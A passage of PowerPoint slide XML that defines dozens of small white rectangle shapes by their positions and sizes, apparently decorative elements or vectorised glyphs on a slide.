          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="CustomShape 236"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10621800" y="4876920"/>
            <a:ext cx="199800" cy="31320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="CustomShape 237"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10621800" y="4851360"/>
            <a:ext cx="199800" cy="10800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="CustomShape 238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9894960" y="4933800"/>
            <a:ext cx="694800" cy="9000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="CustomShape 239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10566360" y="4876920"/>
            <a:ext cx="55080" cy="66240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="CustomShape 240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9956880" y="4694400"/>
            <a:ext cx="34560" cy="70920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="CustomShape 241"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9997920" y="4691160"/>
            <a:ext cx="75960" cy="75960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="CustomShape 242"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10086840" y="4691160"/>
            <a:ext cx="72720" cy="75960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="CustomShape 243"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10469520" y="4729320"/>
            <a:ext cx="352080" cy="34560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="CustomShape 244"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10469520" y="4703760"/>
            <a:ext cx="352080" cy="10800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="CustomShape 245"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9894960" y="4786200"/>
            <a:ext cx="539280" cy="9000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="CustomShape 246"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10412280" y="4729320"/>
            <a:ext cx="56880" cy="66240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="CustomShape 247"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9956880" y="4554360"/>
            <a:ext cx="50400" cy="72720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="CustomShape 248"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10018800" y="4554360"/>
            <a:ext cx="50400" cy="72720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="CustomShape 249"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10074240" y="4554360"/>
            <a:ext cx="41040" cy="74160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="CustomShape 250"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10125000" y="4554360"/>
            <a:ext cx="37800" cy="72720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="CustomShape 251"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10169640" y="4554360"/>
            <a:ext cx="75960" cy="74160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="CustomShape 252"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10260000" y="4554360"/>
            <a:ext cx="45720" cy="72720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="CustomShape 253"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10312560" y="4554360"/>
            <a:ext cx="52200" cy="72720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="CustomShape 254"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10469520" y="4592520"/>
            <a:ext cx="352080" cy="31320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="CustomShape 255"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10469520" y="4564080"/>
            <a:ext cx="352080" cy="10800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="CustomShape 256"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9894960" y="4648320"/>
            <a:ext cx="539280" cy="10800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="CustomShape 257"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10412280" y="4592520"/>
            <a:ext cx="56880" cy="66240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="CustomShape 258"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9950400" y="4405320"/>
            <a:ext cx="41040" cy="75960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="CustomShape 259"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10005840" y="4406760"/>
            <a:ext cx="41040" cy="70920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="CustomShape 260"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10051920" y="4406760"/>
            <a:ext cx="37800" cy="70920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="CustomShape 261"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10093320" y="4406760"/>
            <a:ext cx="39240" cy="70920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="CustomShape 262"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10140840" y="4406760"/>
            <a:ext cx="7560" cy="70920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="CustomShape 263"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10164600" y="4406760"/>
            <a:ext cx="55080" cy="70920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="CustomShape 264"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10234440" y="4405320"/>
            <a:ext cx="75960" cy="75960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="CustomShape 265"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10317240" y="4405320"/>
            <a:ext cx="41040" cy="75960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="CustomShape 266"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10469520" y="4441680"/>
            <a:ext cx="352080" cy="34560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="CustomShape 267"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9894960" y="4498920"/>
            <a:ext cx="539280" cy="9000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="CustomShape 268"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10412280" y="4441680"/>
            <a:ext cx="56880" cy="66240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="CustomShape 269"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8650440" y="4240080"/>
            <a:ext cx="31320" cy="31320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="CustomShape 270"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8686800" y="4240080"/>
            <a:ext cx="33120" cy="31320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="CustomShape 271"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8726400" y="4240080"/>
            <a:ext cx="45720" cy="31320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="CustomShape 272"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8782200" y="4240080"/>
            <a:ext cx="31320" cy="43920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="CustomShape 273"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8821800" y="4229280"/>
            <a:ext cx="1080" cy="42480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="CustomShape 274"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8829720" y="4240080"/>
            <a:ext cx="33120" cy="31320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="CustomShape 275"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8864640" y="4240080"/>
            <a:ext cx="28080" cy="31320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="CustomShape 276"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8913960" y="4230720"/>
            <a:ext cx="26640" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="CustomShape 277"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8943840" y="4254480"/>
            <a:ext cx="15480" cy="4320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="CustomShape 278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8969400" y="4230720"/>
            <a:ext cx="10800" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="CustomShape 279"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994600" y="4254480"/>
            <a:ext cx="15480" cy="4320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="CustomShape 280"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9015480" y="4229280"/>
            <a:ext cx="25200" cy="42480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="CustomShape 281"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9045720" y="4229280"/>
            <a:ext cx="28080" cy="42480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="CustomShape 282"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9083520" y="4230720"/>
            <a:ext cx="12240" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="CustomShape 283"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9109080" y="4240080"/>
            <a:ext cx="28080" cy="31320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="CustomShape 284"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8640720" y="3994200"/>
            <a:ext cx="14040" cy="145800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="CustomShape 285"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8715240" y="3994200"/>
            <a:ext cx="45720" cy="145800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="CustomShape 286"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8821800" y="3994200"/>
            <a:ext cx="45720" cy="145800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="CustomShape 287"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8915400" y="3994200"/>
            <a:ext cx="45720" cy="145800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="CustomShape 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9002880" y="3994200"/>
            <a:ext cx="64800" cy="145800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="CustomShape 289"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9112320" y="3994200"/>
            <a:ext cx="12240" cy="145800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="CustomShape 290"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9190080" y="3994200"/>
            <a:ext cx="48960" cy="145800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
